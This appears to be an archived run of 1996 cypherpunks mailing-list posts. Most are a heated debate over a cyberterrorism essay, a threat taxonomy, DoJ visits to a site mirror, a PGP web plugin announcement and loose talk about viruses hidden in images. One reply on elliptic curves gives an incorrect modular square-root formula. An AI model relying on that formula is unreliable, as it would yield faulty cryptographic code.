Subject: Re: DoJ is poking around
In-Reply-To: <199608281742.DAA30588@heaven.myinternet.net>
Message-ID: <Pine.SV4.3.91.960828233140.7966D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I have a military account. Not all govt or military accounts belong to 
black-helicopter pilots.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Thu, 29 Aug 1996 16:47:04 +0800
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: libelous action
In-Reply-To: <3.0b11.32.19960828165224.006a27ec@central.tansoft.com>
Message-ID: <v03007801ae4ae9bb0f36@[17.219.103.237]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> comments,
>
>I might note that the FTC is showing increased interest in cryptography
>products and the claims of their marketers.
>

Hmm, can we get FTC and NSA to fight: if NSA says that a product may be
exported, maybe FTC won't let the seller claim it is capable of protecting
data.

Intresting.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 29 Aug 1996 16:50:21 +0800
To: "Barry C. Collin" <isi@hooked.net>
Subject: Re: In reference to comments made to me and to the Group
In-Reply-To: <3224A412.D05@hooked.net>
Message-ID: <199608290528.AAA08702@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <3224A412.D05@hooked.net>, on 08/28/96 at 12:54 PM,
   "Barry C. Collin" <isi@hooked.net> said:

Well folks,

I am not in the habit of jumping into flame wars, but......


>This message was in response to comments made by E. Allen Smith on my recent remarks on cyberterrorism.

>Dear Mr. Smith:

>Thank you for your perspectives.  Save for the irrelevant flaming, I appreciated your taking time.  
>Following are my comments.
>  
>>>Terrorism to CyberTerrorism
>>
>>>   The face of terrorism is changing. While the motivations remain the
>>>   same, we are now facing new and unfamiliar weapons. The intelligence
>>>   systems, tactics, security procedures and equipment that were once
>>>   expected to protect people, systems, and nations, are powerless
>>>   against this new, and very devastating weapon. Moreover, the methods
>>>   of counter-terrorism that our world's specialists have honed over the
>>>   years are ineffectual against this enemy. Because, this enemy does not
>>>   attack us with truckloads of explosives, nor with briefcases of Sarin
>>>   gas, nor with dynamite strapped to the bodies of fanatics. This enemy
>>>   attacks us with one's and zero's, at a place we are most vulnerable:
>>>   the point at which the _physical _and _virtual _worlds converge. Let
>>>   us first define theses two domains.
>>
>>	Ever since the dawn of technological civilization, we've been vulnerable
>>to terrorism inflicted by those with technological knowledge and intelligence.
>>Ever since someone discovered how to produce poisonous gases, we've been
>>vulnerable to attacks such as those in the Japanese subways. Ever since the
>>electrification of countries, we've been vulnerable to attacks on power
>>production and distribution systems. Ever since most vehicles became
>>petroleum-powered, we've been vulnerable to attacks on petroleum production and
>>distribution systems. Ever since we found out how to cultivate anthrax, we've
>>been vulnerable to any competent bacteriologist.

>These are all different tools.  Some are simple to create and deploy, some are not.  While the 
>definition of classical terrorism (and its motivations) remain the same, we must study each of 
>these tools separately if we are to understand how to detect, prevent, and respond to the 
>threats.

>>	All the above is is Information Super-Highway hype.

>Thank you for your opinion.

I beleive the concern of Mr. Smith and my others concerning myself is that the methods used to "protect" us from such events are more harmfull than the initial threat.

It is all too often that a minor threat receives massive publicity in the press. Then politions jump in with knee-jerk reactions to add "new and improved" restrictions to ones liberties & give law-enforcement sweeping new powers, Consitution be damed. If you paied any attention to the Senate hearing after Oklahoma and TWA 800 you could such behaviour of our polititions even though such laws will not help 1% to prevent such acts in the future.


>>[...]
>>
>>>Achieving CyberTerrorist Goals
>>
>>>   So how does a CyberTerrorist achieve his mission? Like any terrorist,
>>>   a CyberTerrorist actively exploits the goals of the target population
>>>   in areas in which they take for granted.
>>   
>>>   There are three potential acts in CyberTerrorism at the point of
>>>   convergence:
>>>     * 1.Destruction;
>>>     * 2.Alteration; and
>>>     * 3.Acquisition and retransmission (these are a unit).
>>       
>>   I would point out that many instances of the last (I would guess you refer to
>>the getting and distribution of, say, ITAR-restricted information - you do
>>accuse crackers of complicity in "CyberTerrorism" by breaking military
>>security) are not, properly speaking, terrorism; they are instead the
>>distribution of information that should not be restricted.

>You guessed incorrectly; I'm not talking ITAR.  Test yourself:  Can you think of any sensitive or personal 
>information, that if exposed or utilized, could cause terror -- or destabilization?  If you can't, you are 
>not trying; you should know more than most the value of privacy, whether it be military, corporate, or 
>personal.

I think what we have here is the all to common practice of grouping all criminal activities under the heading of "terrorism".While this may be advantagious for the Federal Government to do so placing what was once the juristiction of the States into the hand of the Feds. It does make nice splashy headlines for the newsmedia so they can sell more newspapers. It has no place in a rational disscusion of the security issues of Computers, Networks, and the Internet.

If someone aquires personal information about myself and at worst steels all the money out of my bank account. That is a crime, it is theft, and their are plenty of laws on the books to handle such a crime. It is NOT terrorism. 

While I agree that there is potential for harm being caused by a sofisticated, well orginised, state sponcered terrorist orginization, I for one am not going to lose any sleep over it. Yes there is a "threat" but No the sky is not falling.


>>One person's
>>terrorist is another person's freedom fighter (I'd call both sides in
>>Nicaragua's Sandanista-Contra conflict terrorists).

>This nifty statement frequently comes from people who've never seen a child blown up, seen people 
>disfigured, seen property damaged beyond all recognition.  Perhaps it is a safe place in your office, Mr. 
>Smith, behind your terminal judging other's thoughts.  I don't have that luxury.  I've spent more than 
>anyone's fair share of time going through rubble, identifying pieces of what were once people, and telling 
>their families.

>Freedom fighters who kill random and innocent victims are terrorists and cowards.  If you feel otherwise, 
>Mr. Smith, perhaps it is time to step out into harm's way, and then perhaps you too will waken in the 
>night with the images that haunt me.  *Then* you can talk to me about such matters.  Until then, stick to 
>coding.


<SIGH> Pulling at ones hartstrings in such a debate only shows the wekness and emptyness of your argument. I am unaware of you location but between growing up in the MiddleEast & my service in the military I have seen my fair share of the "better" side of Man. You by no means have a monopoly on this.

Mr. Smith bring up a vailid point. It is one of perspective. Who you consider terrorist and who you consider heros depends on what side of an issue you stand. The American saw no problem with the 10's of thousands who died in the fire bombing of Dresdin or the Atomic Blasts over Japan. The populations Germany & Japan were supportive of their leadership in the murder of millions durring their campaines of expantion. Look at Ireland; if you are Prodistant or British the IRA are the terrorist while
if you are Catholic then it is the British & Prodistant that are the "terrorist". The Jews in Israel had no problem with blowing up the British but don't like it too much now that the Palisinians are doing the same thing to them.

The whole issue of "Terrorist" vs. "Freedom-Fighter" is one of perspective.

>>   
>>[...]
>>   
>>>Potential CyberTerrorist Acts
>>
>>[...]
>>
>>>     * A CyberTerrorist will attack the next generation of air traffic
>>>       control systems, and collide two large civilian aircraft. This is
>>>       a realistic scenario, since the CyberTerrorist will also crack the
>>>       aircraft's in-cockpit sensors. Much of the same can be done to the
>>>       rail lines.
>>
>>	Only a bloody utter idiot would build such systems without enough
>>backups to avoid these problems; they could come about through computer bugs
>>or component failures as well. Networked systems are notorious for going down
>>(see the recent happenings with AOL, for instance); they're _going_ to have
>>backups if anyone intelligent is running them. Of course, you may have a point
>>with a government-controlled air traffic controller systems.
>>	The same can be said of most of your other scenarios.

>These require more than once person be involved.  Do not kid yourself, we are not dealing with stupid 
>people here.  And bloody utter idiots we have a-plenty -- too many administrators more concerned with 
>their balance sheets to provide the tools people like you need to build safe systems.  You'd be surprised 
>of the amount of criminally-inadequate systems out there.  That's why it _is_ important that folks like 
>you push the envelope to better the systems.  The goal here, Mr. Smith, is to put me out of business, not 
>by flames, but by helping to build better systems.  I think we share that goal.


>>
>>>CyberTerrorists: Who, Where, and Why?
>>
>>>   The purpose of this paper is to help you understand the threats that
>>>   exist, and hopefully, to help you prevent these types of atrocities.
>>>   But know this - there are people out there with very different goals,
>>>   who are our real threats, and who are, or will be, attacking us. Make
>>>   no mistake, _the threats are real, today___.__
>>
>>	Most people with technical knowledge have a pretty large motivation to
>>keep the technical society going. One, the loss of it would make our knowledge
>>useless. Two, we have enough contact with technology and science to want it to
>>continue - how many neo-Luddite engineers do you know? The Unabomber is the
>>main exception... and even he didn't use his main area of knowledge in his
>>bombings.

>We are not concerned with engineers.  We are concerned with fanatics, and fanatics are fanatics whether 
>they are engineers or gardeners.  Do not be so naive to believe that everyone shares the morals you have. 
>Mr. Smith, there are people out there who want you dead, and will use all the techniques you pointed out 
>above to accomplish their goal.  As I said before, technology is just another tool.


>>>   Who are the CyberTerrorists? There a great many poor movies and too
>>>   many works of fiction about the hacker and cracker communities. In the
>>>   popular media, there recently was the Kevin Mitnick incident, where
>>>   one cracker broke into another cracker's systems. This spawned endless
>>>   press and at least two best selling books. While this incident
>>>   received much attention, the events amounted to meaningless children's
>>>   games.
>>
>>	I'd agree with that, from what I know of the Mitnick incident(s). I'm
>>not sure if Shinomura (sp?) should be called a cracker; others with more
>>knowledge can comment on this.

>Agreed.

>   
>>>   By and large, the cracker community, based primarily in the United
>>>   States, Europe, the Middle East, Asia, and in the nations of the
>>>   former Soviet Union, is composed of individuals who see the cracking
>>>   process merely as a challenge, a brain teaser, a puzzle. They view
>>>   themselves as not only being innocent of any crime, but perhaps even
>>>   doing something righteous, something to counter the dark monoliths of
>>>   the corporate and government worlds. They believe they are being
>>>   persecuted. These individuals believe that what they are doing is not
>>>   doing any true damage. At its least harmful, these crackers just look
>>>   at information. However, privacy issues and military secrecy can
>>>   render such infiltrations acts of terror.
>>
>>	Often, military secrecy is just an excuse to not allow information
>>damaging to governments, etcetera from getting out. With NSC involvement, how
>>deeply do you think the Iran-Contra dealings were classified? I would, however,
>>agree with you about privacy issues... but governments are far greater threats
>>in this regard than all the crackers in the world. Much of the information in
>>question would not be around in so many places (such as notoriously accessible 
>>government databanks) except for governments gathering information they
>>shouldn't have in the first place.

>Whether you are right or wrong about what governments have locked away is not in my work area.  As I've 
>said, my work is in fanatics, the disenfranchised, etc.  People are people, and some turn rogue.  It 
>happens.  And people are purchased.  My work keeps me entrenched in such mire regularly.



<SIGH> More unwarrented use of "acts of terror" and "terrorism". Unauthorised access to information is not an act of terror. PEROID. Someone looked at somthing they shouldn't have. that's it. Put that at the criminal level of a mistamener <sp?>. Could someone use that information for a more serious criminal act at some later point in time. Yes. Is this likely, eh mabye, mabye not. If it is illegal for me to carry a knife then I am only guilty of carring a knife I am not guilty of commiting
murder even though it is possiable for me to commit murder with a knife.


>> 
>>[...]
>>  
>>>Crackers as Facilitators
>>
>>[...]
>>
>>>   Historically, individuals engaged in the practice of terror tended not
>>>   to be people working upon a computer 20 hours per day. Terrorists have
>>>   not been in the business of tracking the latest holes found in UNIX or
>>>   an obscure government telnet opportunity. There _are _people, however,
>>>   who are in that business - for illicit as well as good cause. As
>>>   stated, just as indigenous people may be turned into soldiers, so can
>>>   crackers be turned into CyberTerrorists. Sometimes such a transition
>>>   may be motivated by money or prestige. Usually, this transition will
>>>   occur without the cracker's cognizance. The potential threat from such
>>>   transitions is mind boggling, considering the damage even one
>>>   mis-directed cracker can cause.
>>
>>	The first statement is correct... and is likely to continue to be the
>>case. We would appreciate some evidence for such transitions occurring without
>>cognizance, or indeed being at all likelyLet me know what you do for a living, and then we can share more.  

>Not trying to be "spooky", but understand that my piece of the world rests in the violent 
>world, and I need to watch my own back.

We all live in a "violent" world. Alway have and alway will. Just the nature of the beast.

>>   
>>>   Further, as young, educated people are brought into the folds of
>>>   terrorist groups, this new generation will have the talent to execute
>>>   the acts of CyberTerrorism of which we have spoken.
>>
>>	Unlikely. For state-sponsored terrorism, for instance, countries with
>>the motivation for such are also ones that tend to block people from computer
>>experience. Getting on the Internet is rather likely to expose the people in
>>such countries to information that will destabilize them... including programs
>>such as PGP that are restricted by ITAR in the name of (among other things)
>>decreasing terrorism.

>You might be interested in the number of "students" attending our universities that have solid 
>terrorism backgrounds.  The ones I spoke to made their purpose very clear.

And what did you do after speaking the these "students"? As a concerned citizen did you bother to report this information to the State Department, FBI, Immigration? Or did you just walk away with all kinds of warm fuzzies because you got dirty talking to potential "terrorist".

[more bloated rehash of media-catch phrases]  


>>>Ex Post Facto
>>   
>>>   An effective auditing system will only inform the target manager that
>>>   they have taken a hit; perhaps a fatal hit. By that point, it is too
>>>   late. _Now _is the time to take action. Unfortunately, due to this
>>>   open nature of this document, specific counter-CyberTerrorism measures
>>>   cannot be discussed. Those discussions must be reserved for secured
>>>   facilities.
>>

>>	Nobody disagrees with that auditing isn't the _only_ method needed;
>> _everyone_ uses other methods.

>Watch your generalizations.  You'd better tune in to how bad things really are.

>Remember that old saying about prevention and cure?

>>	Your claim that you can't discuss security in the open is laughable.
>>Quite simply, security by obscurity doesn't work; in cryptography, it's one of
>>the signs of "silicon snake-oil" - which is what this document looks like in
>>any event. First, making a system obscure motivates a lot of people to try to
>>find out how it works; intelligent people are curious, and don't like
>>unnecessary secrets unless they're authoritarians. Second, the less people
>>know about a system, the less people can spot bugs to be _fixed_ in that
>>system. I prefer a system that has been tested by as many people as possible,
>>thank you, particularly if my life may depend on it.

>Again, I'm not worried about you at your keyboard clicking away and offering opinions.
>There's more to this than encryption.  Take off the blinders, Mr. Smith: encyrption is just one 
>little piece of this puzzle.  It comes down to psychology, far more than technology.  I 
>appreciate your curiousity, your wish for totally open systems.  In a perfect world, or even a 
>sane world, that would be ideal.  I would love society to be filled with people like you who 
>believe in improving the state of the art, the pushing of the envelope, etc.

>But you are not who I deal with every day.  Unfortunately, just because you don't see these 
>folks, doesn't mean they are not there.  They are not the ones with cutesy handles and who send 
>messages to usenets and such.  It's the people off the radar screen, the one's that know better 
>than to go public.  I've spent way too much time with these nutcases, and I assure you, Mr. 
>Smith, they are very real.

>>	In other words, go back to the drawing board and find something else to
>>try to sound a tocsin over.
>>	-Allen

>Open up your world, Mr. Smith.  There is a whole parallel universe of garbage that exists with
>yours. Whether or not you believe or understand that is frankly irrelevant to me or my work.
>But hopefully this will open your eyes to the fact that this is not about evil governments, nor 
>military spookery, nor commercialization, nor fear of crackers.  The next time I have to travel 
>to a bomb site, and as I try and figure out what cause could justify the death of someone who 
>just happens to be in the wrong place at the wrong time, I will not be thinking of you in your 
>office lecturing me on the computer world.

>Barry C. Collin


Well you have artfully side-steped the issue with a rather self-indulgend tear jerker. The issue presented was that security by obsecurity DOES NOT WORK! If you are that conserned about stoping the dreaded "Cyberterrorest" then you should present your solutions in a open forum for peer review. Ofcource sense we are not part of your elite "counter-cyberterrorest" force I imagine that you do not consider anyone else your peer. Or could it be you inability to debate and defend your ideas in a
public forum with those who have more experiance and better comprehention of the security issues we face at the dawn of the 21st century.

Hiding away is closed groups disscussing solutions to "THE THREAT" where you are the only voice on security may be a big bost to your ego but does little to improve security on a significant scale.


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->You're throwing it all out the Windows!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 29 Aug 1996 17:53:35 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: DoJ is poking around
Message-ID: <3.0b11.32.19960828235710.01192e4c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:21 PM 8/28/96 -0800, Adamsc wrote:
>>> >looks like the DoJ have been looking around at the mirrors.. maybe to
>>> >legally hassle people about them....
>
>>> Or, just maybe, some DoJ employees wanted to see what folks on the outside
>>> were doing to tweek their bosses:-)? Reminds me of the *thousands* of hits
>>> the "Intel Secrets Page"(http://www.x86.org/) has gotten from users at
>>> intel.com 
>
>Out of curiosity, has anyone used a decompiler to check if any of the
>undocumented stuff is getting used in shipping programs?

I have not heard of anyone doing this with the Intel code, but I have seen
info on the "Secret APIs of Bill" (Undocumented Windows API calls) being
used in various programs.  (For more info on this, check out "Undocumented
Windows" by Schulman, Maxey, and Pietrek.)

I am sure that the people who produce SoftIce could give you more info on
this.  (Either that or talk with whoever is doing the undocumented feature
column for Dr. Dobbs.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Justin Card <Wyntermute@worldnet.att.net>
Date: Fri, 30 Aug 1996 17:30:09 +0800
To: cypherpunks@toad.com
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
In-Reply-To: <199608291905.PAA16350@rootboy.interactive.visa.com>
Message-ID: <3225228C.4290@worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


Tom Rollins wrote:
> 
> Hello all,
> 
> I have a math question concerning implementation of elliptic
> curve systems. In coding some elliptic curve source, I
> need to pick a random point on the following elliptic
> curve in field F_p where p is a prime number.
> 
>        Y**2 = x**3 + a * x**2 + b
>        where 4a**3 + 27b**2 is not equal to 0 mod p
> 
> In selecting a random point, I pick a random value for
> x in the range 0 < x < p, compute the right hand side
> of the equation and find myself needing to take the
> square root for the two solutions.

I can't remember the elliptic curve system well, but if the parameters
of the curve are not standard for everyone (which I am afraid they are)
one method is to pick the point first, then solve for the a & b.

If this is not the case, finding the square root may be nice or tricky.

if p=3 mod 4, then the sqrt is
X^(P+1) mod P, where X is the number you are trying to find the sqrt
of.  It can be extended to X=5(mod 8) and a few others, but I'm not sure
how.  There is also a form for X=1 mod 4,but I can't find reference to
it. Hope this helps

-- 
  Wyntermute   
     -----BEGIN GEEK CODE BLOCK-----
     Version: 3.1
     GE d@ s++:+ a? C++++ UL++ P+ L++ E W+++ N+++ o? K--? w !O M-- V?
PS+++
     PE++ Y+ PGP++ t+++ !5 X+++ R++* tv++ b+++ DI++ D++ G++ e h r- !y 
     ------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 29 Aug 1996 18:33:42 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: In reference to comments made to me and to the Group
Message-ID: <199608290752.AAA18432@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sir,

Please get a spell checker before you post any more thousand word 
flame-outs

On Or About: 29 Aug 96, 0:05, William H. Geiger III wrote, jumping into a flame
war before he learned how to spell

 polititions
orginised,
> campaines
 Prodistant
Prodistant 
Palisinians
> Unauthorised  mistamener <sp?>. 
mabye, mabye possiable
> obsecurity 
conserned .
 Ofcource
experiance
 comprehention 
 big bost

These are just a few of the spelling errors in a huge rant!!!!!

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 29 Aug 1996 16:19:07 +0800
To: cypherpunks@toad.com
Subject: Annoucing LivePGP - content security for web (fwd)
Message-ID: <Pine.SUN.3.94.960829012524.10577B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li

---------- Forwarded message ----------
> From ssl-lists-owner@minbne.mincom.oz.au Thu Aug 29 01:00:59 1996
> Message-Id: <01BB9594.5E8FC740@minuet>
> From: Ming-Ching Tiew <mctiew@csi.po.my>
> Subject: Annoucing LivePGP - content security for web
> Date: Thu, 29 Aug 1996 10:25:07 +-800
> Encoding: 54 TEXT
> Sender: ssl-lists-owner@mincom.com
> Precedence: bulk
> 
> Inspired by Adam Cain's write-up ( and others ) on comparison on the using of PGP, 
> SSL/HTTPS, SHTTP and others on Web technologies, I have written a LivePGP 
> plugin for Navigator 3.x and is available for evaluation for anybody who cares to 
> send me a email ( as I don't have  a leased line connection to internet ).
> 
> See below for a summary.
> 
> Thank you, 
> Regards,
> Ming-Ching
> mctiew@csi.po.my
> 
> ------------------------------------------------------------------------------------------------------
> As a summary, this is a plugin for Navigator 3.x which I developed it
> myself, and which I called it LivePGP because it uses LiveConnect and
> PGP.
> 
> LivePGP is a plugin to be loaded on Navigator machine; it secures the
> content before transmittion to the network. Therefore, it doesn't matter
> what network or what's or ever.
> 
> With absolutely no intention to compete with SSL and SHTTP, LivePGP 
> attempts to address some issues with existing security products :-
> 
> 1. 1024-bit key length of PGP in comparison with 40-bit for SSL ( due to 
>     international export limitation ). PGP is a well-known product which   
>     has survived years to testing.
> 
> 2. Extended security vs point-to-point security provided by SSL. Content 
>     coming out of SSL client and server are plain text, which may
>     be subjected to system administrator's tempering with the data. Using 
>     LivePGP, the decryption of data can be relayed as late as (operationally) possible. 
> 
>     More important practical reason is that the signed content can be logged
>     on the client and server; it is very useful to addresss non-repudiation.
>     The client cannot argue that he didnot submit the transaction, because
>     the content which contains the client's signature can be logged and printed out.
>   
>     Similary, system administrator's tempering the data could be checked against
>     with.
> 
> 3. Even thought the plugin is developed using C/C++ and Java,
>    deployment for any scenerio need only standard HTML/Javascript. 
> 
> 4. Client is Win95/NT. Server can be anything. Win3.11 is unknown.
> 
> 5. Every part introduced by me is source code available.
> 
> 6. Can use it together with SSL to make use of the high transparency
>     of SSL.
> 
> 7. Can use it to upload ( signed and encrypted ) local files, in addition
>     to uploading ( signed and encrypted ) web content.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hack Watch News <kooltek@iol.ie>
Date: Thu, 29 Aug 1996 12:02:28 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: stego virus
In-Reply-To: <Pine.LNX.3.95.960828195159.3614A-100000@user1.scranton.com>
Message-ID: <Pine.sol.3.90.960829020001.746C-100000@joyce.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, Moroni wrote:

>    If a virus is embedded into a giff ,is it executed when the giff is or
> does it require the usual overwriting etc methods to execute it?
>                       

The GIF would contain the operational data and the viewer would contain 
the engine. Both would be inert until mixed just like binary nerve 
gasses. The problem would be detecting the data in the GIF or indeed any 
other form of file. Theoretically it could even be part of a text file 
using the high bits.

Regards...jmcc 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 29 Aug 1996 18:16:27 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: DoJ is poking around
In-Reply-To: <Pine.SV4.3.91.960828233140.7966D-100000@larry.infi.net>
Message-ID: <199608290802.DAA09847@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SV4.3.91.960828233140.7966D-100000@larry.infi.net>, on 08/28/96 at 11:32 PM,
   Alan Horowitz <alanh@infi.net> said:

>I have a military account. Not all govt or military accounts belong to 
>black-helicopter pilots.


Hey!

Wern't ya the one who buzzed my trailer park while I was talking to Elvis the other night? :)

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->How do you make Windows faster?  Throw it harder!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Thu, 29 Aug 1996 05:12:26 +0800
To: cypherpunks@toad.com
Subject: DoJ is poking around
Message-ID: <199608281742.DAA30588@heaven.myinternet.net>
MIME-Version: 1.0
Content-Type: text



Im running a mirror of the DoJ site on http://www.skeeve.net/doj/

It has had some 14000 hits or so since I put it up.. so I installed a stats
package to see where they were coming from...

low and behold!

US Government
wdcsun1.usdoj.gov 
       09:07:07 /doj/ 

wdcsun1.usdoj.gov unknown - [28/Aug/1996:09:07:07 +1000] "GET /doj/ HTTP/1.0" 20
0 8416

also

US Military
palisade.spacecom.af.mil 
       07:21:50 /doj/ 
       08:30:51 /doj/ 


looks like the DoJ have been looking around at the mirrors.. maybe to 
legally hassle people about them....

Well since Im not in the US.. good luck DoJ

anyone else been probed by the Doj?


--------------------------------------------------------------------
Skeeve Stevens                              Email: skeeve@skeeve.net
CEO/The Big Boss/All round nice guy      URL: http://www.skeeve.net/
MyInternet                               Australian Anglicans Online
http://www.myinternet.net/               http://www.anglican.asn.au/
Phone: (+612) 869-3334        Mobile: (0414) SKEEVE [+61414-753-383]
Key fingerprint  =  D2 7E 91 53 19 FE D0 5C  DE 34 EA AF 7A 5C 4D 3E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 29 Aug 1996 20:41:29 +0800
To: isi@hooked.net
Subject: Thoughts on CyberTerrorism {per request}
In-Reply-To: <199608290618.XAA12301@mom.hooked.net>
Message-ID: <199608291012.FAA10548@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199608290618.XAA12301@mom.hooked.net>, on 08/28/96 at 10:55 PM,
   "Institute for Security and Intelligence" <isi@hooked.net> said:


My opinions on the topic of CyberTerrorism:


The issue of cyberterrorism can be divided into 3 main parts:

-What is the threat.
-Who is the threat.
-How to respond to the threat.


What is the threat?
===================

This can be subdivided into 3 classifications:

Catastrophic Terrorist Attack
-----------------------------

This type of attack results in the loss of life, or major disruption of society.

Examples:

   - A cyberterrorist cause the major economic disruption by infiltrating international banking systems.

   - A cyberterrorist causes loss of life by infiltrating mass transit system.
        - Air Traffic Control
        - Train systems
        - Subway systems

   - A cyberterrorist causes loss of life/major economic disruption by infiltrating public utility systems.

        - Meltdown of Nuclear Power Station
        - Shutdown of Major Power Grids
        - Oil/Gas Spills

   - A cyberterrorist causes loss of life/major economic disruption by infiltrating military systems and gaining access to military weapons.


Major Criminal Attack
---------------------

This type of attack results in a financial loss or civil liberty infringement but is not of the scale of a Catastrophic Attack.

Examples:

    - A criminal infiltrates a bank computer and illegally transfers funds.

    - A criminal obtains credit card information and uses fraudulently.

    - A criminal obtains personal information and uses illegally.
         - Blackmail
         - Job discrimination
         - credit denials
         - insurance denials


Minor Hacker Attacks
----------------------

This type of attack results in little or no financial loss.

Examples:

    - A hacker breaks into the DOJ webserver and changes the webpages.

    - A hacker breaks into a system and snoops around.

    - A hacker breaks into the school computer and changes his grades.



Who is the Threat?
==================

The CyberTerrorist
------------------

This is a sophisticated, well organized, State sponsored Terrorist.

His goals are the same as any other terrorist. He wishes to reak havok on society to further his political agenda.


The CyberTerrorist/Mad Scientist
--------------------------------

Though his means are the same as the CyberTerrorist his goals are different. He is just a nutcase. Out for the thrill or for his 5min. of fame.


The Computer Criminal
---------------------

These will come in varying levels of sophistication and ability. They will range from the petty thief to the super-hacker that can hack banking systems.

The Hacker
----------

Average age: 15-25 Above average intellegence.

Basically he is in it for the challenge. To brake in a system no one else has broke into. For the most part harmless.



How to Respond to the Threat?
=============================
      
This all depends on which threat you are responding to.

CyberTerrorist
--------------

This one is a tough one. Outside of standard security measures including redundancy & isolation of critical systems the weakest link is going to be the personnel running the systems {what is known as an inside job}.

Deterrents could play a BIG factor in this. If every time a country supported a terrorist attack we turned one of their cities into a glass bowl there would be allot less of this type of thing going on. This would not help with the true diehards/nutcases.

Computer Criminal
-----------------

The best way to defend against the computer criminal is information & training.

System administrators must be aware of potential security risks to their systems.

Software vendors should be open and forthcoming about security holes when they are found.

End users should be familiar with what types of risks are involved when "on-line".
      - what type of information is covertly being gathered about them. {Thank-You NetScape}
      - what type of information should and should not be transmitted in the "open"
      - what is PGP, how to use it, when to use it. Every user should have a copy.

The Hacker
----------

The same as above. If sys-admins are sloppy about security they have much more to worry about than some school kids pranks. Most of the Hackers activities are harmless and can be a mixed blessing in disguise to a sys-admin. A Hackers prank may awaken him to the sad shape of his security and move him to make changes before he gets hit by the Computer Criminal or Cyber Terrorist.



Well that's my basic thoughts on the matter. I restrained from going too indepth as I did want to keep this under 1000 lines (bad spelling and all). :)

I am willing to discuss this more indepth on a point by point basis.


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->2.0 is better than 1; 3.0 is better than 2.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 29 Aug 1996 20:55:01 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: In reference to comments made to me and to the Group
In-Reply-To: <9608290955.AA28509@srzts100.alcatel.ch>
Message-ID: <199608291022.FAA10662@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <9608290955.AA28509@srzts100.alcatel.ch>, on 08/29/96 at 11:55 AM,
   Remo Pini <rp@rpini.com> said:

>No, seriously, your arguments tend to be belittled by your spelling. (Maybe 
>you should get Pronto Secure, it has a spellchecker included)

<sigh> second message I received on this. :(

Well, I ran the spell checker on my follow up posting.

And on this one too. :)

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

